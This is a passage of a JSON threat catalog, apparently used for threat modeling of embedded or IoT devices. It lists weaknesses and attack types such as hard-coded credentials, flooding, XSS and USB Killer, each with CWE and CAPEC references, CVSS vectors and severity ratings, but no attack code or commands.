interface","OriginTypes":[1],"Weakness":{},"ThreatIntroduced":["I","P"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"],"Severity":4},{"ID":"d4292863-c64e-4123-806f-71590ec76ed3","Name":"Improper isolation of shared resoruces","Description":"For example, a specific memory range is only accessible with higher privileges. However, the memory is mapped to another range with unrestricted access. See CWE for more examples.","OriginTypes":[1],"Weakness":{"CWEID":1189},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":2},{"ID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","Name":"Flooding","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"],"AttackTechnique":{"CAPECID":125,"CVSS":{"AV":"N","AC":"L","PR":"N","UI":"N","S":"U","C":"L","I":"N","A":"H","Score":8.2}},"Severity":2},{"ID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","Name":"Log manipulation","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["C","I"],"ThreatExploited":["O","M"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b"],"AttackTechnique":{"CAPECID":93,"CVSS":{"AV":"L","AC":"L","PR":"","UI":"N","S":"U","C":"L","I":"L","A":"N","Score":5.1}},"Severity":2},{"ID":"327a2f35-8cf5-46d5-a973-a174f6f7be23","Name":"Data from decommissioned device","Description":"","OriginTypes":[1,2],"Weakness":{"CWEID":1266},"ThreatIntroduced":["C","I"],"ThreatExploited":["E"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":675,"CVSS":{"AV":"L","AC":"L","PR":"N","UI":"N","S":"U","C":"H","I":"N","A":"N","Score":6.2}},"Severity":3},{"ID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","Name":"Personally identifiable info exposure","Description":"","OriginTypes":[1],"Weakness":{"CWEID":359},"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{}},"Severity":4},{"ID":"23c3a785-a539-4570-aee0-42bdffb43983","Name":"Radio jamming","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["O"],"ThreatExploited":["O"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"],"AttackTechnique":{"CAPECID":601,"CVSS":{"AV":"A","AC":"L","PR":"N","UI":"N","S":"U","C":"L","I":"N","A":"H","Score":7.1}},"Severity":3},{"ID":"0b47795b-b42d-49d1-bf50-7f4889994fea","Name":"Improper certificate validation","Description":"Missing or incorrect certificate validation, e.g. improper validation of chain of trust, expiration, revocation, etc. ","OriginTypes":[1],"Weakness":{"CWEID":295},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Severity":3},{"ID":"d92ccd9c-3a24-4e07-a2ca-c1e9949bb386","Name":"Improper input validation","Description":"","OriginTypes":[1],"Weakness":{"CWEID":20},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":3},{"ID":"ef144ae1-4c70-400e-8222-b8a7dd3bf3e9","Name":"Cleartext storage of sensitive information ","Description":"","OriginTypes":[1],"Weakness":{"CWEID":312},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Severity":3},{"ID":"e851a284-6b41-41c9-9efd-dc8b01f788da","Name":"Cleartext storage on physical storage","Description":"","OriginTypes":[1],"Weakness":{"CWEID":313},"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":3},{"ID":"bb7358c1-e5b6-424f-962d-daab17345b63","Name":"Cleartext transmission of sensitive data","Description":"","OriginTypes":[1],"Weakness":{"CWEID":319},"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"],"Severity":3},{"ID":"001ba17c-0400-4369-912e-0ceda3ccd227","Name":"Improper message integrity verification","Description":"","OriginTypes":[1],"Weakness":{"CWEID":924},"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Severity":2},{"ID":"1a511f9e-5d1b-47b9-9071-4d39407cc75c","Name":"Improper neutralization in SQL command","Description":"","OriginTypes":[1,2],"Weakness":{"CWEID":89},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":66,"CVSS":{}},"Severity":3},{"ID":"f0ef09ed-0cde-4b12-beb6-f1640132f3e6","Name":"Plaintext password storage","Description":"","OriginTypes":[1],"Weakness":{"CWEID":256},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":3},{"ID":"0e3c0e3e-1587-46f8-93ea-e9091dff5958","Name":"Use of hash w/o salt","Description":"","OriginTypes":[1,2],"Weakness":{"CWEID":759},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":55,"CVSS":{}},"Severity":2},{"ID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","Name":"Missing authentication for critical function","Description":"","OriginTypes":[1],"Weakness":{"CWEID":306},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":3},{"ID":"be14adbc-19a7-48c8-8f13-2566559e63e2","Name":"Malicious code implanted during programming","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["P"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"],"AttackTechnique":{"CAPECID":672,"CVSS":{}},"Severity":2},{"ID":"21c6b5ef-82c7-41e5-bb07-de93445b2156","Name":"Replacement with malicious peripheral","Description":"Alteration of PCB (processor, data store, interface controller, any IC) to bypass restrictions, access data, etc.","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["P","D"],"ThreatExploited":["P","D"],"threatCategorieIDs":["c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":439,"CVSS":{}},"Severity":3},{"ID":"90a4e8f3-c750-47c4-97fd-fa9e25b9b599","Name":"Factory oversupply","Description":"The contracted manufacturer produces more parts than specified and keeps/resells the surplus.","OriginTypes":[],"Weakness":{},"ThreatIntroduced":["P"],"ThreatExploited":["P"],"threatCategorieIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"],"Severity":2},{"ID":"a912b48a-3b4d-44ab-b8f3-28000ca945c4","Name":"Provisioning data cloning","Description":"The contracted manufacturer clones data that was initially inserted (e.g., key material).","OriginTypes":[],"ThreatIntroduced":["P"],"ThreatExploited":["P","D"],"threatCategorieIDs":[],"Severity":2},{"ID":"97b5a1d4-be82-4485-82f6-e4532795a20b","Name":"Algorithm downgrade","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":757},"Severity":3},{"ID":"a20d6e53-4426-4700-a04f-a4018bc7bfce","Name":"Weak block cipher mode","Description":"Deprecated block cipher modes, such as ECB or CBC, do not provide enough security.","OriginTypes":[],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Severity":3},{"ID":"680ceebd-357c-49d6-8bfd-390dc6c51dde","Name":"Nonce reuse","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":323},"Severity":3},{"ID":"c23a62c8-901a-412b-80b8-d2574103b733","Name":"Firmware downgrade","Description":"For practical reasons a downgrade is probably necessary, but security patches should not be reversible (e.g. by using special security version numbers).","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["U"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":1328},"Severity":3},{"ID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","Name":"Inadequate encryption strength","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":326},"Severity":2},{"ID":"9538abd8-f79c-4097-b2dd-716e50a125ee","Name":"Permissive status display","Description":"Details about status, configuration, software version, metadata, logging data, operation status, etc. are shown to unauthorized users","OriginTypes":[1],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":200},"Severity":2},{"ID":"b9436449-7896-4be6-89f8-a19e1c8d014f","Name":"Missing password field masking","Description":"","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":549},"AttackTechnique":{"CAPECID":508,"CVSS":{"AV":"L","AC":"L","PR":"N","UI":"R","S":"U","C":"H","I":"L","A":"L","Score":6.6}},"Severity":2},{"ID":"5435aa9a-ad52-470f-8fa5-81a4f926b6a6","Name":"Weak password requirements","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":521},"Severity":3},{"ID":"723dfb40-4ceb-4232-bda5-73bcb3c76ac0","Name":"Hard-coded credentials","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":798},"Severity":4},{"ID":"5e7fd04c-0e14-4c76-800d-f581bcf7c7f6","Name":"Default password","Description":"A common vulnerability are default credentials that can be found in the manual.","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":560,"CVSS":{"AV":"A","A":"H","C":"H","I":"L","Score":8.3}},"Weakness":{"CWEID":557},"Severity":3},{"ID":"63dfaefa-c8a8-4725-b6d6-2efff7306639","Name":"Single-factor authentication","Description":"","OriginTypes":[1],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":308},"Severity":2},{"ID":"296e95fe-e06d-4ae3-be84-da98df4a122c","Name":"Missing authentication attempt restriction","Description":"","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":307},"AttackTechnique":{"CAPECID":49,"CVSS":{}},"Severity":2},{"ID":"bf289171-82c3-431a-b3f1-28d17e5a6546","Name":"Insufficient session expiration","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":613},"Severity":2},{"ID":"2f483201-0209-4320-ba2e-2d692274aab5","Name":"Password recovery mechanism","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":638},"Severity":2},{"ID":"4ee3fc8a-87a5-4fdf-868f-fb35cd12dc91","Name":"Client-side password hashing","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":836},"Severity":3},{"ID":"05e04798-41ce-4919-a92b-264f7e985de2","Name":"Password hash with predictable salt","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":760},"Severity":1},{"ID":"e6c3d6f5-f4c7-48b7-b516-2092c3557c81","Name":"IC reverse engineering","Description":"","OriginTypes":[1],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"],"Weakness":{"CWEID":1278},"Severity":2},{"ID":"1447713d-9ad6-454e-81d8-c9f4ef34c72b","Name":"Battery draining attack ","Description":"Denial of sleep, flooding attacks","OriginTypes":[2],"ThreatIntroduced":["C"],"ThreatExploited":["O"],"threatCategorieIDs":["9e715340-1a69-47df-864a-7c3b5a9a678e","b869918c-0b47-45c3-8fab-0b698043aa66","08d8fbba-5de4-4538-8674-43e214c3ebad","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"],"AttackTechnique":{"CAPECID":125,"CVSS":{}},"Severity":2},{"ID":"195d942e-02f8-49ad-873f-299f4b4ad4ec","Name":"HID/Keyboard spoofing","Description":"An USB stick imitates a keyboard to inject commands. The stick may be a present or found in the parking lot.","OriginTypes":[2],"ThreatIntroduced":["C"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"],"AttackTechnique":{"CAPECID":null,"CVSS":{"AV":"L","AC":"L","PR":"L","UI":"R","C":"H","I":"H","A":"H"}},"Severity":3},{"ID":"cf948333-b659-40ff-b93f-d4bdc8c980d1","Name":"Phishing","Description":"","OriginTypes":[2],"ThreatIntroduced":["O"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{},"CAPECID":98},"Severity":3},{"ID":"915f674e-926b-4bd9-94cb-ee8b4637bc80","Name":"USB Killer","Description":"A device that looks similar to an USB flash drive creates high-voltage pulses to damage/destroy the hardware. This type of attack is also possible at other interfaces than USB as there are publicly available adapter for HDMI and Thunderbolt, for example.","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","88d19822-b1b0-469f-ae00-1bc600ccaa1d","644f8521-6b49-41bc-86df-4064b89fb881","96bdc11d-dbb0-4785-8a5c-373e2c492eb0"],"AttackTechnique":{"CVSS":{"AV":"L","AC":"L","PR":"N","UI":"R","S":"U","C":"N","I":"L","A":"H","Score":6.1}},"Severity":3},{"ID":"f5949698-47d4-48ee-a116-2d212695c41f","Name":"Port scanning","Description":"","OriginTypes":[2],"ThreatIntroduced":[],"ThreatExploited":["O"],"threatCategorieIDs":[],"AttackTechnique":{"CVSS":{"AV":"A","AC":"L","PR":"N","UI":"N","S":"U","C":"L","I":"N","A":"N","Score":4.3},"CAPECID":300},"Severity":1},{"ID":"b8835cb9-3c77-496e-ac2d-2ed6fa7f2d78","Name":"Protocol manipulation","Description":"","OriginTypes":[2],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"AttackTechnique":{"CVSS":{},"CAPECID":272},"Severity":2},{"ID":"573881b4-ceb6-4d6a-a5c3-9c0e6c5a3b3c","Name":"Actuator command injection","Description":"","OriginTypes":[2],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":[],"AttackTechnique":{"CVSS":{}},"Severity":3},{"ID":"a76b8768-9d68-4074-b5e1-0f9abc61bcda","Name":"Sensor data manipulation","Description":"","OriginTypes":[2],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f2ba26f4-b2da-49a8-aba2-14e42a746d6a","b7935cfe-6a41-45e4-8778-f0fbb1e4018b"],"AttackTechnique":{"CVSS":{}},"Severity":3},{"ID":"30cf5142-2339-4130-8a6e-2b05869e6df2","Name":"Physical theft","Description":"","OriginTypes":[2],"ThreatIntroduced":["O"],"ThreatExploited":["O"],"threatCategorieIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","6b8c08cb-3f02-413a-96b4-179bb1f67997"],"AttackTechnique":{"CVSS":{"AV":"L","AC":"L","PR":"N","UI":"N","S":"U","C":"N","I":"N","A":"H","Score":6.2},"CAPECID":507},"Severity":2},{"ID":"c7787e71-5c70-462c-9558-ce20e7cfdfe8","Name":"Selective forwarding","Description":"Selective forwarding of messages/network packets ","OriginTypes":[2],"ThreatIntroduced":[],"ThreatExploited":["O"],"threatCategorieIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","f2b91aaf-7d9f-4baf-8713-13d7625174d9"],"AttackTechnique":{"CVSS":{}},"Severity":2},{"ID":"184cd5e5-2517-4d7f-a81a-c411942d3601","Name":"Unpublished interfaces","Description":"","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{"C":"H","Score":9.8,"I":"H","A":"H"},"CAPECID":36},"Weakness":{"CWEID":1242},"Severity":3},{"ID":"83d23b79-71c5-488e-adb2-dd0f76d70f44","Name":"Firmware modification","Description":"","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["U"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{"A":"H","Score":9.8,"I":"H","C":"H"},"CAPECID":165},"Severity":4},{"ID":"afd4bceb-31b0-41cd-9eae-02d2eba6b41c","Name":"Insufficient logging","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b"],"Weakness":{"CWEID":778},"Severity":2},{"ID":"f170308a-c188-4ae0-bcef-d04af1e429b3","Name":"Mutable Root of Trust","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":1326},"Severity":3},{"ID":"cf63f187-4353-4bf8-bc37-a7392c6d91bf","Name":"TOCTOU attack","Description":"","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{"A":"H","Score":9.8,"I":"H","C":"H"},"CAPECID":29},"Weakness":{"CWEID":367},"Severity":3},{"ID":"ffd6083b-7183-472c-b250-15b0de223735","Name":"Password sharing","Description":"Users/Employees share the password, e.g. using a note next to the device.","OriginTypes":[],"ThreatIntroduced":["S","O"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":2},{"ID":"66c5f951-6286-4b22-a71a-ee4d6232f689","Name":"Incorrect default permissions","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec"],"Weakness":{"CWEID":276}},{"ID":"eab94c5b-f7e8-4b2a-9ffb-658aefc8f0d0","Name":"Insufficiently protected credentials","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":522},"Severity":3},{"ID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef","Name":"Identity spoofing","Description":"","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"],"AttackTechnique":{"CVSS":{},"CAPECID":151},"Severity":2},{"ID":"71f761e4-8149-4a88-92fd-35f9d99cc0ef","Name":"Logging sensitive information","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O","M"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":532},"Severity":3},{"ID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","Name":"Sensitive information exposed","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":200},"Severity":3},{"ID":"e36eff83-1863-4026-bffe-966a9a104331","Name":"Uncaught exception","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":248},"Severity":2},{"ID":"6509fe5f-7e27-40ec-bd08-97e29c67f8c1","Name":"Use of expired certificate","Description":"","OriginTypes":[1],"ThreatIntroduced":["I","O"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":324},"Severity":2},{"ID":"ed84da5f-3181-4be1-bef4-d911077b1910","Name":"Improper check of certificate revocation","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":299},"Severity":2},{"ID":"b26fc3e4-7a38-4f00-acdb-ec78246d0b25","Name":"Improper certificate chain verification","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":296},"Severity":2},{"ID":"3162421f-ca5b-400d-bbe8-58a510be9abf","Name":"Missing authorization check","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":862},"Severity":3},{"ID":"4e007b60-94e7-4df3-b3bd-109eb8627da2","Name":"Replay attack","Description":"Replaying a capture network package","OriginTypes":[1],"ThreatIntroduced":["I","C"],"ThreatExploited":["O"],"threatCategorieIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f"],"Weakness":{"CWEID":294},"Severity":2},{"ID":"b48781b2-24a2-481b-b7c1-3390dbeeb973","Name":"Cross Site Scripting (XSS)","Description":"See CWE-79 and CAPEC-63","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":79},"AttackTechnique":{"CVSS":{},"CAPECID":63},"Severity":4},{"ID":"04d5f07e-2482-451b-9e24-94cb650da53b","Name":"Use of broken/risky cryptographic algorithm","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b"],"Weakness":{"CWEID":327},"Severity":3},{"ID":"7742f998-ab1e-4f64-8ac6-12b3f97b936a","Name":"Unawareness","Description":"The affected subject is not aware of the collection, processing, storage, or sharing of the subject\'s data.","OriginTypes":[],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","aead4d1d-0f64-42b4-a512-cbbc979af3ca","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},{"ID":"0217b20a-5e3a-4244-8dce-819e28050a47","Name":"Credential stuffing","Description":"","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{},"CAPECID":600},"Severity":3},{"ID":"1909127e-50bd-4892-8b1f-1a2123a4fa61","Name":"Password spraying","Description":"","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{},"CAPECID":565},"Severity":3},{"ID":"e060675a-41d0-4c4d-9e16-311bb4adec7b","Name":"Insecure default 